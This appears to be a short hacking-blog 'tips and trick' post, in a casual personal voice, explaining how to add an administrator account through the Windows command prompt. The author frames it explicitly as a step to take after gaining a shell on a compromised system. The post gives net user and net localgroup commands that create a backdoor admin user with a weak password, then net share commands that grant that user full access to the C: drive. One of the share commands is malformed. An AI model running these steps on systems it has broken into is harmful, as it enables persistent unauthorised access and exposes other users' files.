Type : Tips and Trick
Level : Easy
Today actually I just finished my exam… Chinese exam was absolutely very hard mate, because you need to know and read the characters ๐
Okay just forget about my exam, today I just want to share a simple tips and trick for today, about "How to Add User With Administrator Rights Using Command Prompt". If you follow this tips and trick, maybe it will not exceed 1 minute, even for some of you can do it in less than 30 second ๐
Ah I also just want to inform you that in next 2 articles(just wait for the update), I will post a tips and trick and also hacking tutorial about Remote Desktop (for some of you who don’t familiar with console, you will love it ๐ )
This tips and trick will add a user with administrative rights, you will need it when you owned a system to add a user there.
Okay lets start it.
1. Command Prompt [or] shell you got from a compromised system
1. Open your command prompt and type this command :
net user /add v4L 12345
The command above will add user name v4L with password 12345. If you just add until this step, you just add user with limited privilege.
2. The next step, we continue to add another command :
net localgroup administrators v4L /add
Now in this 2nd step, we add our user v4L to administrators group. Now this user already has an administrative rights.
3. We move again to the last 3rd step, now lets type again another command :
net share concfg*C:\/grant:v4L,full
net share SHARE_NAME=c:\ /grant:v4L,full
The command above will grant user name v4L will full grant, that’s mean v4L can do everything on the system including see other users file ๐
Hope it useful m8 ๐
Update: 5 Steps to disable or enable administrator role using command prompt